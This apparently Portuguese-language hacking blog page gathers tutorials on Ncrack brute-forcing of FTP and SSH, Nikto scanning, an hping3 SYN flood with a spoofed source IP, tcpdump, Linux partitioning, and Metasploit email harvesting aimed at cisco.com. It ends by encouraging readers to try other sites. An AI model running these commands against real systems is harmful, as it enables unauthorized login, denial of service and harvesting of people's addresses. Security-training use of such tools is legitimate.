Select Menu

Anuncios !!



Ncrack é uma ferramenta de código aberto para autenticação de rede . Ele foi projetado para craqueamento paralelo de alta velocidade usando um motor dinâmico que pode se adaptar a diferentes situações de rede. Ncrack também pode ser extensivamente aperfeiçoá-lo para casos especiais, embora os parâmetros padrão são genéricos o suficiente para cobrir quase todas as situações. Ele é construído sobre uma arquitetura modular que permite a extensão fácil de suportar protocolos adicionais. Ncrack é projetado para empresas e profissionais de segurança para auditar grandes redes de padrão ou senhas fracas de forma rápida e confiável. Ele também pode ser usado para realizar os ataques de força bruta bastante sofisticados e intensiva contra serviços individuais.

Instalação:

Baixe o arquivo:

$ wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz

Descompacte:

$ tar -xzf ncrack-0.4ALPHA.tar.gz

Entre na Pasta Que foi gerada:

$ cd ncrack-0.4ALPHA

Execute :

$ ./configure
$ make
$ su root
$ make install

Quebra de Senha no FTP:

Vamos preparar a nossa wordlist :



No Ncrack exitem parâmetros bem similares ao do nmap nesse exemplo atacaremos um servidor FTP:

# ncrack -v -T5 --user caos -P /root/senhas.txt 192.168.0.33:21


Onde:  -v : Modo verboso, nos da mais informações sobre o alvo;
           -T5 : Intensidade do ataque, que Varia de 0 a 5, onde 3 é defult;
          --user: Especifica um unico Usuario;
           -P : Especifica uma lista de senhas;
          192.168.0.33:21 : Servidor do ip ":" Porta do alvo.



Ao realizar o ataque a senha do usuário informado é revelada caso esteja no arquivo senhas.txt

Login: caos
Senha: hackercomcafe



Quebra de senha no SSH:

Onde:  -v : Modo verboso, nos da mais informações sobre o alvo;
           -T5 : Intensidade do ataque, que Varia de 0 a 5, onde 3 é defult;
          --user: Especifica um unico Usuario;
           -P : Especifica uma lista de senhas;
          192.168.0.33:22 : Servidor do ip ":" Porta do alvo.



Observe que o ataque foi efetuado com sucesso, obitivemos o Usuario e a Senha do SSH

Login: caos
Senha: P@ssword

Depois é só acessarmos o nosso serviço SSH:



- -

Nikto é um scanner de vulnerabilidade de serviços web. Seu uso é simples e eficaz.
É necessário que o perl instalado na maquina atacante para que o nikto funcione.
No Kali o Nikto já vem instalado por Defult, então se você está com o Kali pule o passo de Instalação.
Mas se você utilizando outra maquina Linux a intalação é o seguinte:

Instalação:

Baixando o Nikto:

$ wget -c http://www.cirt.net/nikto/nikto-current.tar.gz

Descompacte:

$ tar -xzpf nikto-current.tar.gz 

Após a descompactação entre na pasta, não é necessario a instalação pois o mesmo é um script perl.

Digitando nikto no seu terminal ele lhe dara as opções.

O primeiro passo é a atualização dos plugins:
# nikto --update

A usagem é a seguinte:

# nikto -C all -h [ip_do_alvo] -p [Portas] -o [arquivo_de_saida].txt



Onde:
-C - Força a checagem de todos os diretórios em busca de cgi;
-h - Indica o Host a ser averiguado;
-p - Especifica a Porta, se esse paramentro não for incluído ele varrera só a porta 80;
-o - Indica Um arquivo onde serão guardados a saída.

Agora é só obsevarmos o arquivo de saída: 



-
Syn

Vamos começar entendendo o que é "Syn":

Syn era uma deusa da mitologia nórdica ou germânica, considerada a guardiã das portas dos mundos mágicos.


ops: Contexto errado :D


SYN que é a abreviação de synchronize que traduzindo para o português significa sincronizar, é a primeira mensagem que é enviada quando um computador deseja comunicar-se com outro.

Quando um cliente tenta começar uma conexão TCP com um servidor, o cliente e o servidor trocam um série de mensagens, que normalmente são assim:
  • O cliente requisita uma conexão enviando um SYN ao servidor.
  • O servidor confirma esta requisição mandando um SYN-ACK(acknowledge) de volta ao cliente.
  • O cliente por sua vez responde com um ACK, e a conexão está estabelecida


Essa é a conexão normal que chamamos de  Three-Way Handshake .

Dos 

DoS significa "Denied of Service" (Negação de serviço). Que tem como o objetivo principal deixar o serviço indisponível. Neste caso o atacante não invade o computador ele apenas o sobrecarrega. Geralmente o ataque de negação de serviço é feito de duas maneiras:

Local: Esse ataque consome tanto os recursos que força a indisponibilidade do recurso (como memória ou processamento por exemplo.

Remoto: Faz uma inundação de pacotes inúteis causando obstrução a midia de comunicação entre os utilizadores e o sistema vítima de forma a não comunicarem-se adequadamente. Vai ter tanto Pacotes inuteis que os pacotes verdadeiros não vão poder realmente estabelecer conexão.

Conhecendo o Ataque: 

O Syn Flooding consiste em manda vários pacotes syn de uma vez só não esperando o retorno da Flag Syn-Ack. Com tantas requisições inuteis o serviço acaba ficando sobregarregado e não consegue fazer o Three-Way Handshake , esse Dos remoto que manda pacotes Syn é bem suficiente para derrubar um alvo.


Laboratório:
  1. Usei aqui um Linux, pode ser qualquer um, eu usei o Elementary OS 0.2 Luna como atacante;
  2. Windows XP com a ultima atualização como alvo.

Ferramenta:

Instalação:

No kali essa ferramenta é nativa, mas para voce instlar em derivados de Debian é facil:
# apt-get -y --force-yes install hping3 
Apresentação:

Hping é uma ferramenta de teste de ping, mas ela não faz só pingar, no ping tradicional existe um limite que vai depender do seu sistema. Já no Hping você manda o pacote do tamanho da sua preferencia. 

Vamos mandar um Help na ferramenta


São tantas possibilidades de ultilização do Hping que não deu pra colocar tudo em um print só, mas essas primeiras são as mais importante.

Sintaxe:

A sintaxe de ultilização para syn flood é simples:
# hping3 --flood --syn -c 10000 -a 10.50.81.78 -p 80 10.50.81.56

Onde:

--fload          enviado pacotes o mais rápido possível. Não mostrar respostas. 
-S  --syn       envia a  SYN flag 
-c                  determina o número de pacotes
-a                  faz um spoof no seu Ip [ Opicional ]
-p                  a Porta que você quer floodar
                     Pro ultimo o Ip.

Colocando em Pratica:



Aqui ainda não iniciei o ataque o uso da CPU varia de 0 a 10 %


Com uma Shell atacando o uso da cpu sobe impressionantemente   . A variação fica de 40 a 67 %


 Com duas Shells Atacando Chega a quase 90 %



Com as três alcança o 100 % de uso da Cpu.

Nesses casos a vitima esta sem nenhum firewall, fiz mais testes com o Firewall Comodo Ligado.







O resultado não foi muito diferente, só tive de usar uma shell a mais pra consegui alcançar os 100 %

-
TCPdump é um poderoso Sniffer com interface em linha de comando.

Ele deve ser usado como root (Superuser) ou com direitos de super usuario.

1. Intalação do TCPDUMP:

Fazer o download do programa:

#apt-get install tcpdump

Para ver as dependencias:

#apt-cache depends tcpdump

2. Sintaxe:

Protocolos suportados:

ether, FDDI, IP, ARP, RARP, DECNet lat, sca, moprc, mopdl, TCP e UDP.
Se nenhum protocolo é especificado, todos os protocolos são usados.

Para onde apontar:

* src, dst, src e dst, src ou dst *
Se nenhuma fonte ou destino for especificado, os "src ou dst" palavras-chave são aplicadas.
Por exemplo, "host 10.2.2.2" é equivalente a "src ou dst anfitrião 10.2.2.2".

Host(s):

Values: net, port, host, portrange.
Se nada for especificado host é usado.
Por exemplo, "src 10.1.1.1" é equivalente a "src host 10.1.1.1".

Operações lógicas:

Valores: NOT (não), AND (e), OR (ou).
Negação NOT ("não") tem maior precedência. Alternância OR ("ou") e de concatenação AND ("e") têm a mesma precedência e associam esquerda para a direita.
Por exemplo,
"not tcp port 3128 and tcp port 23" is equivalent to "(not tcp port 3128) and tcp port 23".
"not tcp port 3128 and tcp port 23" is NOT equivalent to "not (tcp port 3128 and tcp port 23)"

Tradução : "Não tcp porta 3128 e porta TCP 23" é equivalente a "(não a porta TCP 3128) e tcp porta 23".
"Não a porta TCP 3128 e TCP porta 23" não é equivalente a "não (porta TCP 3128 ea porta TCP 23)"

3.Modo de Usar:

Para exibir a saída TCPdump padrão:

#tcpdump

Em modo Verboso:

#tcpdump -v

Mostra as interfaces que são suportadas:

#tcpdump -D

Para exibir endereços numéricos ao invés de endeereços (DNS) simbólicos:

#tcpdump -n

Para exibir a saída rápida:

#tcpdump -q

Capturar de uma interface em particular:

# tcpdump -i wlan0


Captura UDP:

#tcpdump udp

Captura de trafego na porta 80:

#tcpdump port http

Captura o trafego e o armazena em um arquivo:

#tcpdump -F file_name

Capturar apenas 20 pacotes:

#tcpdump -c 20

Para enviar a saída de captura em um arquivo em vez de diretamente na tela:

#tcpdump -w capture.log

Para ler um arquivo de captura:

#tcpdump -r capture.log

Os dados capturados não são armazenadas em texto simples para que você não pode lê-lo com um editor de texto, você tem que usar uma ferramenta especial como TCPdump ou Wireshark, que fornece uma interface gráfica.

Para exibir os pacotes com "www.google.com" como seu endereço de origem ou destino:

#tcpdump host www.google.com

Para exibir os pacotes FTP provenientes de 192.168.1.100 para 192.168.1.2:

#tcpdump src 192.168.1.100 and dst 192.168.1.2 and port ftp

Para exibir o conteúdo dos pacotes:

#tcpdump -A


- -


/boot :: para a instalação do boot do sistema.

  • Tamanho : 300 MB
  • Tipo : Primaria
  • Tipo de sistema de arquivos : ext2
  • Ponto de Montagem: /boot

/(Raiz) :: Para instalação do Sistema


  • Tamanho: Recomendado 4.5 GB minimo.
  • Tipo: Lógica
  • Tipo de sistema de arquivos : ext4
  • Ponto de Montagem: /


/ home :: Pasta Usuário
  • Tamanho:  A critério
  • Tipo: Lógica 
  • Tipo de sistema de arquivos : ext4
  • Ponto de Montagem: /home


SWAP :: Partição dedicada a memoria Virtual.

  • Tamanho:  Metade da memoria RAM do seu Dispositivo
  • Tipo: Logica
  • Tipo de sistema de arquivos : swap área



Se você vai usar DualBoot com outro sistema operacional uma coisa que é bem legal é você recuperar o seu GRUB.

"Em computação, GNU GRUB (ou apenas GRUB) é um multicarregador de um sistema operacional (multi boot boot-loader) criado pelo projeto GNU.

É utilizado, normalmente, quando se deseja que um computador tenha dual booting, ou seja, que o usuário possa escolher ao iniciar a máquina, um sistema operacional (SO) dentre dois ou mais sistemas instalados. Em termos técnicos ele é um programa que pode carregar qualquer arquivo (ficheiro) executável com um cabeçalho multi boot nos seus primeiros 8 kB.
Este cabeçalho consiste uma sequência de bits com: 32 bits de um "número mágico", 32 bits de flags mais 32 bits de um outro número mágico seguidos pela imagem do arquivo executável. O GNU GRUB foi desenvolvido a partir de um pacote chamado GRand Unified Bootloader, de onde deriva o acrônimo GRUB. O sistema operacional GNU utiliza o GRUB, assim como muitas distribuições GNU/Linux...".



A instalação é bem traquila.

$ sudo add-apt-repository ppa:yannubuntu/boot-repair

$ sudo apt-get update

$ sudo apt-get install boot-repair

Ai depois é só correr pro abraço :P

Usando o Metaesploit para capturar email

Ative tudo que o Metasploit precisa pra funcionar





Depois abra o terminal ( ctrl + alt + T ) e digite : msfconsole





Com o Comanda "Search" você procura tudo relacionado com o seu objetivo o nosso é o Gather

msf> search gather
Ou pra ser mais direto pesquise por email_collector

Para usar use o comando "use" mais o caminho

msf> use auxiliary/gather/search_email_collector

Com o clear você limpa a tela e show options você exibe as opções

msf auxiliary(search_email_collector)> clear

msf auxiliary(search_email_collector)> show options




Identifique os parâmetros:



  • DOMAIN
  • OUTFILE


Depois é só usar os comandos abaixo:



msf auxiliary(search_email_collector)> set domain cisco.commsf auxiliary(search_email_collector)> set outfile resultado.txtmsf auxiliary(search_email_collector)> clearmsf auxiliary(search_email_collector)> run




O que esse auxiliar faz basicamente é procurar em motores conhecidos emails do site em que você setou!

Infelismente o resultado não nos voltou nenhum resultado, mas tente em outros sites ou servidores própios que exitem vários sites com algo esposto, sempre tem ;)
-